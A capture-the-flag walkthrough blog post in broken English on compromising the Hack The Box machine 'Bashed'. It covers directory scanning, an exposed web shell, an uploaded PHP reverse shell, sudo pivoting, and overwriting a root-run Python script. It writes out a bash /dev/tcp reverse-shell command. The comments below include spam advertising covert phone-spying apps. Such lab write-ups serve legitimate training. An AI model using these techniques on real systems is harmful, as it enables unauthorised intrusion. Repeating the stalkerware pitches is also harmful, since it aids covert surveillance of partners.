OSCP PREPROTİONS – HTB Bashed

Bashed machine is a vulnerable machine with Linux operating system among retired machines. Using these vulnerabilities, we are expected to obtain user and root flags.
We perform a network scan to recognize the target machine,


Classic Scan

Full port scan

As a result of the port scan, we saw that only http port 80/tcp is open and the http service is running.
Because of the http service, we continue our target enumuration through the browser.

We did enumeration on the website and did not find any information. We performed gobuster and dirbuster directory scan.

As a result of the directory scan, we detected /css, /dev, /fonts, /images, /index.html, /js, /php, /server-status, /uploads directories.
We looked in all of them and the /dev directory was the most interesting

These pages have opened us Shell as we know it
We were able to run the commands we wanted

Let’s run a bash revershell since we can run the commands we want
bash -i >& /dev/tcp/10.10.14.13/1234 0>&1
We listen to our ncat ilearakda shel before running the command.

We didn’t get any Shell ☹
Let’s try uploading Shell in the uploads section here

We went under the Uploads folder and created a file named muhammed

As we can see, if we write a file that is not here, it will give us an error. Here let’s try to upload pentest monkey’s php revershel

We loaded our Shell into the machine
Now let’s run our shelter

Ta ta ta ta we got our shel

Let’s investigate what we can run with sudo -l when we are not authorized at Shel

When we ran sudo -l we saw that we can run scrpitmanager with all root privileges

By typing the command “sudo -u scrpitmanager bash” we have authorized the user and then we saw and wrote our user flag.

When we want to access the root falge, it gives us an authorization error.

We tried to elevate authorization using the sudo -l command, we looked at it and saw that it asked us for a password and we could not access it when we did not have password information.
We provide local enumeration.

The Scripts directory attracts our attention. In the Scrpits directory, test.py and test.txt files attracted our attention

Here test.py writes to test.txt after running.

Here we delete the test.py file and create a test.py that will give us reverhsell.

On our machine we will create a python file called test.py that will generate a reverhsell
We take our python revershell in Pentest monkey, edit it and save it.

Now we make a web wervis in python to transfer the file to the destination and dowloand the file on the destination

Our attacker machine

target machine

We added our reversehle to the target machine and waited 1 minute.
Then we got our reversehel that we opened in the back.

and we were able to get a root flag

Comments

  1. Śledź telefon

    Monitoruj telefon z dowolnego miejsca i zobacz, co dzieje się na telefonie docelowym. Będziesz mógł monitorować i przechowywać dzienniki połączeń, wiadomości, działania społecznościowe, obrazy, filmy, WhatsApp i więcej. Monitorowanie w czasie rzeczywistym telefonów, nie jest wymagana wiedza techniczna, nie jest wymagane rootowanie.

  2. Szpiegowskie Telefonu

    Aby całkowicie rozwiać wątpliwości, możesz dowiedzieć się, czy twój mąż zdradza cię w prawdziwym życiu na kilka sposobów i ocenić, jakie masz konkretne dowody, zanim zaczniesz podejrzewać, że druga osoba zdradza.

  3. tlovertonet

    Hello There. I found your blog using msn. This is a very well written article. I’ll make sure to bookmark it and return to read more of your useful info. Thanks for the post. I’ll certainly return.

  4. fun88 ถอนเง น นาน ไหม

    ดังนั้น ถ้าคุณกำลังมองหาประสบการณ์การเดิมพันที่สนุกและไม่มีเวลาเบื่อ พร้อมทั้งต้องการความปลอดภัยในการทำธุรกรรม กับ fun88 บ ญช เวปไซต คุณจะได้สัมผัสความสุขและความสำเร็จในการเดิมพันกีฬาและคาสิโนสดทุกวัน

  5. SightCare reviews

    I’m just writing to let you be aware of of the amazing experience my wife’s child went through reading the blog. She even learned plenty of issues, which include how it is like to have an incredible helping heart to get the others clearly know precisely certain specialized subject areas. You truly did more than my expectations. Thank you for offering the helpful, healthy, informative and in addition fun tips on your topic to Julie.

  6. cbd bestellen

    My spouse and I absolutely love your blog and find most of your post’s to be just what I’m looking for. can you offer guest writers to write content for yourself? I wouldn’t mind publishing a post or elaborating on many of the subjects you write with regards to here. Again, awesome blog!

  7. acheter cbd

    Unquestionably imagine that which you stated. Your favourite justification appeared to be on the web the simplest thing to bear in mind of. I say to you, I definitely get annoyed while other people think about issues that they just do not recognise about. You controlled to hit the nail upon the highest as smartly as outlined out the whole thing without having side effect , people can take a signal. Will probably be back to get more. Thank you

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir